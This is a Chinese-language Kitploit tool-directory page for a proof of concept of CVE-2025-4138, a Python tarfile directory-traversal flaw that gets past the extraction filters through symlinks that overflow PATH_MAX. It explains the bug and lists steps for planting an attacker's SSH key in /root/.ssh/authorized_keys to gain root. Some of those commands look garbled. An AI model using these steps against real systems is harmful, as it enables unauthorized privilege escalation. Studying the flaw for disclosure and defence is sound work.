Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4138 — Tarfile模块目录穿越漏洞(带有溢出跨越目录)--> 导致权限提升 | Kitploit
工具/GitHubGitHub/localh0ste/cve-2025-4138
权限提升漏洞分析漏洞利用论文与研究学习与教育二进制利用
GitHublocalh0ste/cve-2025-4138

CVE-2025-4138

Tarfile模块目录穿越漏洞(带有溢出跨越目录)--> 导致权限提升

查看仓库
6个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-4138 (Python Tarfile 模块目录遍历漏洞,带溢出的跨目录)

影响:权限提升


工作原理:

Python 的 TarFile.extractall() 和 TarFile.extract() 方法支持设置过滤器以提高这些方法使用时的安全性。Python 标准库提供了两种实现 tar_filter ("tar") 和 data_filter ("data"),各自具有不同的检查措施来提升 tar 文件提取的安全性。

当处理包含符号链接的路径时,如果该路径短于 PATH_MAX,但在通过 os.path.realpath() 替换符号链接后长于 PATH_MAX,则存在一个漏洞。任何超出 PATH_MAX 的符号链接都不会被展开。

"tar" 和 "data" 过滤器使用 os.path.realpath() 验证路径,但如果超出 PATH_MAX,则不会抛出错误。随后在 extractall() 或 extract() 中使用这些路径时,不会再次通过 os.path.realpath() 传递它们。

参考:https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f


如何使用 PoC:

  1. 我们将把自己的 SSH 公钥粘贴到 /root/.ssh/authorized_keys 以实现权限提升。
  2. 按照以下命令进行利用
root@kitploit:~
ssh-keygen -t ed25519 -f any
mkdir test

mv any.pub authorized_keys
cp authorized_keys /test
cd test

# 将你的公钥文件名改为 authorized_keys
python3 exploit.py
(file.tar) ~ 已生成

# 现在使用 Python3
sudo python3 tar -xvf file.tar

# 登录
chmod 600 any
ssh -i any user@ip

下载工具